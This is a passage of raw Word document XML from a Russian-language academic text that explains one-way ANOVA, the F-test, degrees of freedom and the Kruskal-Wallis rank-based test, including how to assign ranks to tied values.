        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="00A43272">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270FF1FF" w14:textId="6F912A0F" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0043580C">
      <w:r w:rsidRPr="0043580C">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="00A43272">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:t xml:space="preserve">) – </w:t>
      </w:r>
      <w:r>
        <w:t>общее среднее наблюдений, (</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="00A43272">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>) – среднее наблюдений в каждой группе (градации фактора).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C387D3" w14:textId="78A6F4C9" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0043580C">
      <w:r>
        <w:t xml:space="preserve">Чтобы провести однофакторный дисперсионный анализ данных исследуемой модели, необходимо найти фактическое значение Фишера – </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>отношение дисперсии, объяснённой влиянием фактора (межгрупповой), и необъяснённой дисперсии (внутригрупповой)</w:t>
      </w:r>
      <w:r w:rsidR="00C625A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C625A2" w:rsidRPr="00C625A2">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C625A2" w:rsidRPr="00C625A2">
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3E685E" w14:textId="4C174BA9" w:rsidR="0093378B" w:rsidRPr="00107CA1"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408F21CB" wp14:editId="588C25C1">
            <wp:extent cx="51435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342900"/>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4E104F79" wp14:editId="1477C92D">
            <wp:extent cx="514350" cy="3429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342900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="004C1501">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E36B942" w14:textId="26AC6408" w:rsidR="0093378B" w:rsidRDefault="004D038C" w:rsidP="0043580C">
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t xml:space="preserve"> сравнить его с критическим</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t xml:space="preserve"> табличным</w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t xml:space="preserve"> значением Фишера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446E1462" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0043580C">
      <w:r>
        <w:t>Дисперсии рассчитываются следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E10D3BC" w14:textId="4A3AF5C6" w:rsidR="0093378B" w:rsidRPr="00D06CCC" w:rsidRDefault="0093378B" w:rsidP="00D06CCC">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62C5AFEB" wp14:editId="567457D2">
            <wp:extent cx="657225" cy="31432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143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54FAB7D7" wp14:editId="454B1ACA">
            <wp:extent cx="657225" cy="31432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14325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D06CCC">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D06CCC">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="004C1501">
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06CCC">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7697AEDB" w14:textId="631E89E4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D06CCC">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="316B9B68" wp14:editId="414C74D4">
            <wp:extent cx="638175" cy="3143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835B8A1" wp14:editId="7924796F">
            <wp:extent cx="638175" cy="31432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66369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D06CCC">
        <w:t>(1</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="004C1501">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06CCC">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C066A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D06CCC">
      <w:r>
        <w:t>При этом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322ED7EA" w14:textId="0FDC7E27" w:rsidR="0093378B" w:rsidRPr="00107CA1" w:rsidRDefault="0093378B" w:rsidP="00D06CCC">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>QUOTE</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF8B5C8" wp14:editId="459CAA6C">
            <wp:extent cx="723900" cy="1428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42875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53628376" wp14:editId="7ACCBF95">
            <wp:extent cx="723900" cy="14287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42875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A43272">
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:t>(1</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="00A43272">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E09D1" w14:textId="4172D48F" w:rsidR="0093378B" w:rsidRPr="00107CA1" w:rsidRDefault="0093378B" w:rsidP="00D06CCC">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>QUOTE</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="055A1C7D" wp14:editId="234C345E">
            <wp:extent cx="695325" cy="1619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61925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <m:oMath>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>df</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>n</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <m:t>-</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>a</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:tab/>
        <w:t>(1</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="00A43272">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6B80A5" w14:textId="65A0C3A4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D06CCC">
      <w:r w:rsidRPr="00D06CCC">
        <w:t>(1</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="00A43272">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06CCC">
        <w:t xml:space="preserve">) – </w:t>
      </w:r>
      <w:r>
        <w:t>число степеней свободы объяснённой дисперсии, (1</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="00A43272">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>) – общее число степеней свободы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20334576" w14:textId="799A0FE9" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D06CCC">
      <w:r>
        <w:t xml:space="preserve">Также, при анализе учитывается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06CCC">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>уровень значимости. Расчёт данного значения производится с помощью неполной бета-функции, и её алгоритм не будет рассмотрен, так как выходит за рамки текущего исследования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661698A" w14:textId="696AF543" w:rsidR="00DC68C3" w:rsidRPr="00DC68C3" w:rsidRDefault="00DC68C3" w:rsidP="00D06CCC">
      <w:r>
        <w:t xml:space="preserve">Таким образом, исследователь, </w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t xml:space="preserve">рассчитав </w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF" w:rsidRPr="008F14CF">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t xml:space="preserve">значение и </w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF" w:rsidRPr="008F14CF">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t>критерий Фишера сможет принять или отклонить нулевую гипотезу об отсутствии различий между дисперсиями исследуемых популяций</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC7BBC" w14:textId="23829255" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D06CCC">
      <w:r>
        <w:t xml:space="preserve">Как было описано выше, при проведении однофакторного дисперсионного анализа необходимо выполнение аксиом о нормальности распределения данных и о равной дисперсии среди групп. При нарушении этих аксиом проводить однофакторный дисперсионный анализ нельзя, т.к. результаты в виде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0094">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">уровня значимости и фактическое значение Фишера будут </w:t>
      </w:r>
      <w:r w:rsidR="00A43272">
        <w:t>неточны</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Чтобы провести анализ при нарушении этих правил, необходимо выполнить так называемый </w:t>
      </w:r>
      <w:r w:rsidR="00F17274">
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t>параметрический тест.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1EB76A" w14:textId="248ABB74" w:rsidR="00BC1FD1" w:rsidRDefault="0093378B" w:rsidP="00BC1FD1">
      <w:r>
        <w:t xml:space="preserve">Одним из непараметрических методов дисперсионного анализа является тест по </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Краскелу-Уоллису</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0094">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0094">
        <w:t xml:space="preserve">]. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Суть метода заключается в присвоении рангов </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>данных: минимальное значение будет иметь ранг под номером 1, а максимальное значение среди данных будет иметь</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t xml:space="preserve"> наибольший</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ранг</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1">
        <w:t xml:space="preserve">, затем по формуле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC1FD1">
        <w:t>Краскела-Уоллиса</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC1FD1">
        <w:t xml:space="preserve"> происходит расчет </w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00BC1FD1">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1">
        <w:t xml:space="preserve">критерия (непараметрический аналог </w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00BC1FD1">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1">
        <w:t xml:space="preserve">критерия), но подробное рассмотрение алгоритма дисперсионного анализа по </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC1FD1">
        <w:t>Краскелу-Уоллису</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC1FD1">
        <w:t xml:space="preserve"> выходит за рамки текущего исследования, в настоящем параграфе будет рассмотрен лишь классический однофакторный дисперсионный анализ, применённый к ранговым данным. Если выполнить обычный дисперсионный анализ на основе ранговых номеров исходных значений анализируемой модели, то результат совпадет с результатом </w:t>
      </w:r>
      <w:commentRangeStart w:id="21"/>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve">теста </w:t>
      </w:r>
      <w:commentRangeEnd w:id="21"/>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:rStyle w:val="af0"/>
        </w:rPr>
        <w:commentReference w:id="21"/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AC25AD">
        <w:t>Краскела-Уоллиса</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AC25AD">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AC25AD">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AD0094">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1">
        <w:t xml:space="preserve">Также если бы анализируемые данные удовлетворяли условиям нормальности и однородности групповых дисперсий, то статистическая мощность теста </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC1FD1">
        <w:t>Краскела-Уоллиса</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC1FD1">
        <w:t xml:space="preserve"> в отношении таких данных составила бы примерно 95% от обычного параметрического дисперсионного анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F4395" w14:textId="794DECA1" w:rsidR="006700C7" w:rsidRDefault="006700C7" w:rsidP="006700C7">
      <w:r>
        <w:t>Ранг – это порядковый номер наблюдения в выборке, упорядоченный по возрастанию. Если выборка не содержит повторений, то ранги данным следует присвоить следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52405550" w14:textId="77777777" w:rsidR="006700C7" w:rsidRDefault="006700C7" w:rsidP="006700C7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B5202A8" wp14:editId="3E5F34D1">
            <wp:extent cx="1971923" cy="1211836"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="6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90266" cy="1223108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915C205" w14:textId="584088A4" w:rsidR="006700C7" w:rsidRPr="002B2CF3" w:rsidRDefault="006700C7" w:rsidP="006700C7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Присвоение рангов данных</w:t>
      </w:r>
      <w:r w:rsidRPr="002B2CF3">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>без повторяющихся значений</w:t>
      </w:r>
      <w:r w:rsidRPr="002B2CF3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C0F922" w14:textId="77777777" w:rsidR="006700C7" w:rsidRDefault="006700C7" w:rsidP="006700C7">
      <w:r>
        <w:t>Здесь чёрным цветом (верхний ряд) выделены исходные данные, а красным (нижний ряд) – присвоенные им ранги. Грубо говоря, выборку нужно просто отсортировать по возрастанию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022537C" w14:textId="77777777" w:rsidR="006700C7" w:rsidRDefault="006700C7" w:rsidP="006700C7">
      <w:r>
        <w:t>Если же данные содержат повторения</w:t>
      </w:r>
      <w:r w:rsidRPr="009C53F7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>то повторяющимся значениям необходимо посчитать средний ранг:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE9967D" w14:textId="77777777" w:rsidR="006700C7" w:rsidRDefault="006700C7" w:rsidP="006700C7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="392A8369" wp14:editId="22371052">
            <wp:extent cx="3554233" cy="1099165"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="63"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78518" cy="1106675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3EF61A" w14:textId="6C1045E3" w:rsidR="006700C7" w:rsidRDefault="006700C7" w:rsidP="006700C7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Присвоение рангов данных (с повторяющимися значениями)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D74223C" w14:textId="77777777" w:rsidR="006700C7" w:rsidRDefault="006700C7" w:rsidP="006700C7">
      <w:r>
        <w:t xml:space="preserve">В данном случае у повторяющихся «двоек» порядковые номера в выборке – 2 и 3. Средний ранг считается как среднее арифметическое этих чисел: </w:t>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3257ED6A" wp14:editId="723BBE91">
            <wp:extent cx="695325" cy="28575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66369B">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
